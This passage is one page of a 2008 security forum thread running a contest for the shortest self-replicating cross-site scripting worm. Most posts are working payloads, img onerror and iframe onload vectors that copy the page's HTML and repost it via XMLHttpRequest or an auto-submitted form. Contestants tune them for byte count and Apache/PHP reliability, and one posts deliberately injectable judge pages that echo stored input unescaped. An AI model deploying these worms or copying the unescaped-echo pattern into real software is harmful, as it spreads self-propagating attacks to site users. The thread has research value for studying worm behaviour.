Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 15 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 08:27AM

Self referencing image worm:-

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">

Expect a ton of posts :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/09/2008 08:35AM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 09, 2008 08:46AM

@Gareth - You seem to have forgot the payload, but otherwise nice one.

Here is what I came up with off of yours, though it is 99% yours:
<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">



Edited 1 time(s). Last edit at 01/09/2008 08:52AM by Matt Presson.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 09, 2008 09:02AM

Digi7al, your XHR 140 byte xss worm doesn´t seem to work here. The PHP complains about missing content.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 09:05AM

Shame about the content type header eh? :( ah well :-

<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 09:47AM

Here's another without XHR:-

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 11:10AM

As far as I can tell, both the "application/x-www-form-urlencoded" content type header and encoding (even if improper) honoring the declared content type are mandatory to ensure reliable Apache compatibility (which is required by rule #9).
Moreover, the "We'll assume post.php will properly URL unescape your code" words in rule #2 authorize the assumption that the receiving endpoint is a PHP script processing the POST as urlencoded name-value pairs, e.g. through the auto-populated $_POST superglobal. Therefore, plus signs ("+") will be turned into spaces, and even weirder stuff is gonna happen if your payload contains ampersands ("&") unless you escape them.

For these reasons, I think the shortest fully compliant XHR code so far is the following:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"

The 209 bytes above have been the bare minimum I needed successfully replicate on a stock Apache 2.2.6 (Fedora) powered by PHP 5.2.4 (mod_php), all from FC7 rpms (definitely not an "exotic configuration").

If we drop the explicit header setting but we keep the "+" escaping requirement, assuming Apache or the browser will "automagically" guess the proper content-type (which I couldn't see happening anyway), it becomes:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"

140 bytes

Otherwise, dropping all encoding requirements (which doesn't make much sense, IMHO), we could strip it down to:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"

132 bytes

-- edit
Added missing ")" at the end of the 132 bytes vector spotted by Ronald (just a typo, count was right and remains the same).

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 01/09/2008 01:06PM by ma1.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 11:48AM

Well, it works like a charm on 4 Apache instances, so it's just not true ma1, Apache does handle the content-type itself through content negotiation, everything being send is executed perfectly. If it wasn't it would fail, but it doesn't fail on 4 machines, the worm gets properly posted and processed like the specs tells us to. But, I'm not the judge.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 12:19PM

Ronald Wrote:
-------------------------------------------------------
> Well, it works like a charm on 4 Apache instances,
> so it's just not true ma1

Wow, if you're right my 132 byte above is the winner so far, unless I'm missing some post ;)
What I pity I cannot see it working...

> Apache does handle the
> content-type itself through content negotiation

I believed content-negotiation was a mechanism for choosing the variant of the content best suitable to the user agent and serve it through the downstream, rather than the way around.
But if it works like you say, and the upstream is "negotiated" to application/www-form-urlencoded, what does happen to the "+" char I can see in every single XHR entry when it is properly URL unescaped per rule #2? Shouldn't it become " " according to this specification?
In other words, did you try to echo $_POST['content'] in a real post.php script?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 12:26PM

I havent managed to get $_POST['content'] on any machine.. Apache 1.3 nor Apache 2, on windows.. nor Linux.. maybe on another OS..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 12:32PM

No not alone, it is also involved in guessing the mimes, plus the content-type as well as more stuff, like extension mapping.

I did tested it with a post.php file, and echoed back content, of course ;) when strislashes applied, it went into a loop proving that it functions. But, remember I am talking about my vector, plus .mario's one. the IMG vector respectively: 134 and 135 bytes.

I thought about XHR caching, but after some tests that wasn't the case either. So I am a bit in a blur here due to your results. Turn off NoScript! ;))

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 12:46PM

> I did tested it with a post.php file, and echoed
> back content, of course ;)

Leaving the "+" char untouched?
Happy to hear that, I hope RSnake's has the same setup as yours, otherwise I'm just second behind .mario "the sniper" :P

> remember I am talking about my
> vector, plus .mario's one. the IMG vector
> respectively: 134 and 135 bytes.

Once the request is on the wire, they're perfectly equivalent to those 132 bytes of mine.

> So I am a bit in a
> blur here due to your results. Turn off NoScript!
> ;))

NEVER!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 12:46PM

:S I dunno what I'm doing wrong..
<?php
    if(isset($_POST['content']))
        die($_POST['content']);
?><html>
<head>
<title>try 1</title>
</head>
<body>
<script type="text/javascript">
var x=new XMLHttpRequest();
x.open("POST","post.php",false);
x.send("content=hello");
alert(x.responseText);
</script>
</body>
</html>

--edit 1
btw that alerts the same source code, it should alert "hello".

--edit 2
it works with the content-type header

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/09/2008 12:48PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:02PM

haha yes..

ma1, This is strange. I can now confirm indeed that it doesn't work. I did try one of my own vectors again on a simple Apache 1.3.39 and it didn't respond anymore. Hmmm, in that case all vectors without the proper encoding are invalid. I'm still trying to understand what happened, or what went wrong here. So, indeed we must rule them out ma1, your absolutely right here.

btw, your latest 132 misses a: ")" in my testlab, well it's invalid anyhow now.

woohoo! it gets exciting, so short till the end :)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 01:08PM

@Ronald:
thanks for spotting the missing ")", it was just a transcription typo (the 132 count was right).
Edited above.
Anyway, as far as I can see my 209 is "the shortest compliant XHR possible", right?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:10PM

With the test I meant:
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 01:22PM

@ma1

Same as mine if this works on IE:-
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 01:26PM

@Gareth:

watch out the "+", it becomes " ".

If it didn't mine would be just:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"
(201 bytes)

-- edit 3
did a mess copying and pasting from the wrong post, fixed now

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 01/09/2008 01:48PM by ma1.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:42PM

I guess it's oficial, that the content-type must be set: http://www.w3.org/TR/XMLHttpRequest/#setrequestheader

It states for clients (like a browser):

"If no Content-Type header is in the list of
request headers append a Content-Type header to the list of request
headers with a value of 'application/xml'."
- so that is the default, if none is set.

a real bummer actually, but it was too good to be true. Now it's to go back in my tracks and find out what caused it to execute while the vector was absent of the required mime.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:45PM

@ma1 yes, I saw.

But I like the image better, for various reasons and aestetics :) so vain, so vain I know.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 01:46PM

Ronald:
so.. we can do this?


<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>

?? that would also be awesome..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:52PM

@sdc: it also missed: ')'

No that doesn't work :)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:03PM

bah nothing works :(
so, we have 1 more day guys!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:12PM

I'm a bit confused now, what kinds of methods do we have now? is it a good idea to sum them up? because it's way muddy now.

IMO this can be ruled out as far as I know:


- XHR without content-type
- vector with only id, or document selectors like: id="bar" bar.foo(), or only document.foo.bar()
- iframes without closing tag (exception on:slice)
- stuff like: src=. since it becomes: =""



Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 02:25PM

Oookay, some clarification needed, it looks like. XHR without content type looks like it's okay. (Sorry, there was some confusion on my part about what FF2.0.0.11 did and didn't automatically send)

Vectors with id="bob" are okay, as long as you define them. Vectors referencing { or < or any often used char should be considered non-starters for the same reason body=onload is a non-starter. It'll conflict with too many pages.

iframes without closing tags are fine (as long as they don't grow) - slices are okay

About the + thing, assume plusses are treated as spaces. Eg:

echo urldecode($_REQUEST[content]);

___REVISED REGARDING XHR___

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 05:52PM by rsnake.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:29PM

For what it's worth, here's my final submission:
form: 152

<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


xhr: 198

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

Going to bed now, i'm tired! :) goodluck fellas, have a good one.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:42PM

this are the sources of the unnoficial judges:
judge1.php
<?php
session_name("XSSCONTEST");
session_start();
	if(isset($_GET['sc'])){
		die(file_get_contents("judge1.php"));
	}
	if(isset($_GET['logout'])){
		session_destroy();header("Location: ?");exit;
	}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>UNOFFICIAL JUDGE OF THE "Diminutive XSS Worm Replication Contest"</title>
<script type="text/javascript" src="js.js"></script>
<style type="text/css">
	@import url('css.css');
</style>
</head>
<body>
<h1>THIS IS THE UNOFFICIAL JUDGE OF THE <a href="http://sla.ckers.org/forum/read.php?2,18790">Diminutive XSS Worm Replication Contest</a></h1>
<?php
if(isset($_SESSION['content'])){
	echo $_SESSION['content'];
?><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!-->
<div id="passed">&nbsp;</div>
<pre>
<?php echo htmlentities($_SESSION['content']);?>
</pre>
<i>Count:<?php
echo $_SESSION['count'];
?> | Length: <?php
echo strlen($_SESSION['content'])."</i>";
}else{
?>
	<form method="post" action="post.php">
	<textarea name=content></textarea>
	<input type=submit>
	</form>
<?php
}
?>
<p>
Att. <a href="http://www.sirdarckcat.net/">sirdarckcat</a> | <a href="?sc">source code</a> | <a href="?logout">logout</a>
</p>
</body>
</html>
judge2.php
<?php
session_name("XSSCONTEST");
session_start();
	if(isset($_GET['sc'])){
		die(file_get_contents("judge2.php"));
	}
	if(isset($_GET['logout'])){
		session_destroy();header("Location: ?");exit;
	}
?>
<html>
<head>
<title>UNOFFICIAL JUDGE OF THE "Diminutive XSS Worm Replication Contest"</title>
<script type="text/javascript" src="js.js"></script>
<style type="text/css">
	@import url('css.css');
</style>
</head>
<body>
<h1>THIS IS THE UNOFFICIAL JUDGE OF THE <a href="http://sla.ckers.org/forum/read.php?2,18790">Diminutive XSS Worm Replication Contest</a></h1>
<?php
if(isset($_SESSION['content'])){
	echo $_SESSION['content'];
?><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!-->
<div id="passed">&nbsp;</div>
<pre>
<?php echo htmlentities($_SESSION['content']);?>
</pre>
<i>Count:<?php
echo $_SESSION['count'];
?> | Length: <?php
echo strlen($_SESSION['content'])."</i>";
}else{
?>
	<form method="post" action="post.php">
	<textarea name=content></textarea>
	<input type=submit>
	</form>
<?php
}
?>
<p>
Att. <a href="http://www.sirdarckcat.net/">sirdarckcat</a> | <a href="?sc">source code</a> | <a href="?logout">logout</a>
</p>
</body>
</html>
post.php
<?php
session_name("XSSCONTEST");
session_start();
$_SESSION['count']++;
$_SESSION['content']=stripslashes($_POST['content']);
?>
<script>self.location.href=document.referrer;</script>
js.js
if(document.cookie.match(/noalert=1/)){
	eval("v"+"a"+"r"+" "+"a"+"l"+"e"+"r"+"t"+"="+"'"+"'"+";");
	alert=function(x){
		try{
			if(/^xss$/i.test(x)){
				document.getElementById("passed").innerHTML="CORRECT";
			}else{
				with(document.getElementById("passed"))
					innerText=textContent="WRONG - "+x;
			}
		}catch(e){
			try{
				window.onload=function(){
					alert(x);
				}
			}catch(e){}
		}
	}
	try{
		var tal=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Return the alert".link("javascript:document.cookie='noalert=0';location.reload();")
		}
	}catch(e){}
}else{
	try{
		var tal=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Remove alert".link("javascript:document.cookie='noalert=1';location.reload();")
		}
	}catch(e){}
}
if(document.cookie.match(/triggerevents=1/)){
	function trig(odom){
		for(var i=0;i<odom.childNodes.length;i++){
			try{odom.childNodes.onmouseover();}catch(e){}
			try{odom.childNodes.onmousemove();}catch(e){}
			try{odom.childNodes.onmousedown();}catch(e){}
			try{odom.childNodes.onclick();}catch(e){}
			try{odom.childNodes.onfocus();}catch(e){}
			try{odom.childNodes.onmouseup();}catch(e){}
			try{odom.childNodes.onblur();}catch(e){}
			try{odom.childNodes.onsubmit();}catch(e){}
			if(odom.childNodes.childNodes){
				trig(odom.childNodes);
			}
		}
	}
	function ttv(){
		trig(document.body);
	}
	try{
		var tev=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Dont trigger events".link("javascript:document.cookie='triggerevents=0';location.reload();")
		}
	}catch(e){}
}else{
	try{
		function ttv(){}
		var tev=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Trigger events".link("javascript:document.cookie='triggerevents=1';location.reload();")
		}
	}catch(e){}
}
window.onload=function(){tal();tev();ttv();}
css.css
#passed{background-color:green;color:black;}
h1 a{display:block;}
body,a{background-color:black;color:white;}
textarea{width:100%;background-color:black;color:white;}

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/09/2008 02:51PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 02:44PM

149 chars!!!! new leader?

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/09/2008 02:47PM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 02:50PM

rsnake Wrote:
-------------------------------------------------------
> Vectors with id="bob" are okay, as long as you
> define them.

What about doctype?
Most if not all the vectors posted here reference elements by id using the deprecated <foo id="bar">...<script>bar.doSomething()</script> idiom, which won't work depending on doctype.
I suppose you mean that id="bob" is okay as long as you retrieve the node using document.getElementById("bob") right?

@Ronald:
they both grow (the iframe one on IE only).

@Gareth:
ditto, you can prevent iframe from growing using slice, but it will buy you too many chars.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/09/2008 02:53PM by ma1.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:52PM

I hope the ; wasn't a mistake Gaz! ->148

<form><input name='content'><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:53PM

149 anyway..

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 02:54PM by sirdarckcat.

Options: ReplyQuote
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 15 of 20


Sorry, only registered users may post in this forum.